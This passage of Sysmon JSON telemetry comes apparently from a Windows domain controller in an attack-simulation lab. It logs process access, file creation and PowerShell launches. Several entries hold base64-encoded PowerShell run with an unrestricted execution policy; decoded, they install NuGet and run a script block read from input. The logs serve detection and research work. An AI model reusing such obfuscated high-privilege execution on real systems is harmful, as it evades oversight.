l+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4453,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.329\r\nSourceProcessGUID: {41C8662E-20BB-5F25-0000-001091620600}\r\nSourceProcessId: 1232\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BC-5F25-0000-0010CE860600}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.329","SourceProcessGUID":"{41C8662E-20BB-5F25-0000-001091620600}","SourceProcessId":"1232","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BC-5F25-0000-0010CE860600}","TargetProcessId":"4276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4454,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:58:52.329\r\nProcessGuid: {41C8662E-20BC-5F25-0000-0010FA820600}\r\nProcessId: 4124\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\wbimrl4c.dll\r\nCreationUtcTime: 2020-08-01 07:58:52.032","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:58:52.329","ProcessGuid":"{41C8662E-20BC-5F25-0000-0010FA820600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\wbimrl4c.dll","CreationUtcTime":"2020-08-01 07:58:52.032","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4455,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.647\r\nProcessGuid: {41C8662E-20BC-5F25-0000-00104D890600}\r\nProcessId: 2608\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyAAoASQBuAHMAdABhAGwAbAAtAFAAYQBjAGsAYQBnAGUAUAByAG8AdgBpAGQAZQByACAALQBOAGEAbQBlACAATgB1AEcAZQB0ACAALQBNAGkAbgBpAG0AdQBtAFYAZQByAHMAaQBvAG4AIAAyAC4AOAAuADUALgAyADAAMQAgAC0ARgBvAHIAYwBlAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BB-5F25-0000-0020E0610600}\r\nLogonId: 0x661E0\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-20BB-5F25-0000-0010A2710600}\r\nParentProcessId: 1632\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.647","ProcessGuid":"{41C8662E-20BC-5F25-0000-00104D890600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyAAoASQBuAHMAdABhAGwAbAAtAFAAYQBjAGsAYQBnAGUAUAByAG8AdgBpAGQAZQByACAALQBOAGEAbQBlACAATgB1AEcAZQB0ACAALQBNAGkAbgBpAG0AdQBtAFYAZQByAHMAaQBvAG4AIAAyAC4AOAAuADUALgAyADAAMQAgAC0ARgBvAHIAYwBlAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BB-5F25-0000-0020E0610600}","LogonId":"0x661e0","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-20BB-5F25-0000-0010A2710600}","ParentProcessId":"1632","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4456,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.642\r\nSourceProcessGUID: {41C8662E-20BB-5F25-0000-0010A2710600}\r\nSourceProcessId: 1632\r\nSourceThreadId: 3056\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20BC-5F25-0000-00104D890600}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFD152F8890)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.642","SourceProcessGUID":"{41C8662E-20BB-5F25-0000-0010A2710600}","SourceProcessId":"1632","SourceThreadId":"3056","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20BC-5F25-0000-00104D890600}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFD152F8890)","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4457,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.642\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BC-5F25-0000-00104D890600}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.642","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BC-5F25-0000-00104D890600}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4458,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.642\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.642","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4459,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.642\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.642","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4460,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.642\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.642","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4461,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.642\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 